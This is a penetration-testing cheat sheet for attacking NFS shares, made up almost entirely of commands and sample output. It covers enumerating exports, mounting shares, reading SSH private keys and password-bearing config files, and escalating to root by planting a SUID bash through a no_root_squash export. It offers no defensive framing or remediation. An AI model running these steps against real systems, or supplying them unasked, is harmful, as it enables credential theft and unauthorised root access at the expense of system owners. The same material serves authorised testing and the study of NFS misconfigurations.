NFS (2049)
Show exports
List NFS shares — Find mountable shares
showmount -e $IP
Example Output
showmount -e 10.10.10.5
/home/backup *(rw,no_root_squash)
/var/www *(ro)
(no_root_squash = privesc possible)
Mount share
Mount and browse — Full file access
mkdir /tmp/nfs
mount -t nfs $IP:/<share> /tmp/nfs
Example Output
mkdir /tmp/nfs
mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
ls /tmp/nfs/
.ssh/ documents/ notes.txt
(Full access to user's home directory)
Check for SSH keys
Private keys — Instant SSH access
ls -la /tmp/nfs/home/*/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa
cat /home/admin/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
(Copy to attacker, chmod 600, ssh -i)
Check for sensitive files
Config files, backups — Passwords in config files
find /tmp/nfs -name '*.conf' -o -name '*.txt' -o -name '*.bak'
Example Output
find /tmp/nfs -name '*.conf' -o -name '*.txt'
/tmp/nfs/notes.txt: 'DB password: MySQLr00t!'
/tmp/nfs/.ssh/id_rsa: -----BEGIN RSA PRIVATE KEY-----
Check permissions / no_root_squash
Privesc via NFS — Write SUID shell, execute on target
If no_root_squash: create SUID binary on share
Example Output
cat /etc/exports shows: no_root_squash
On attacker as root:
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash
On target:
/home/backup/rootbash -p
# whoami
root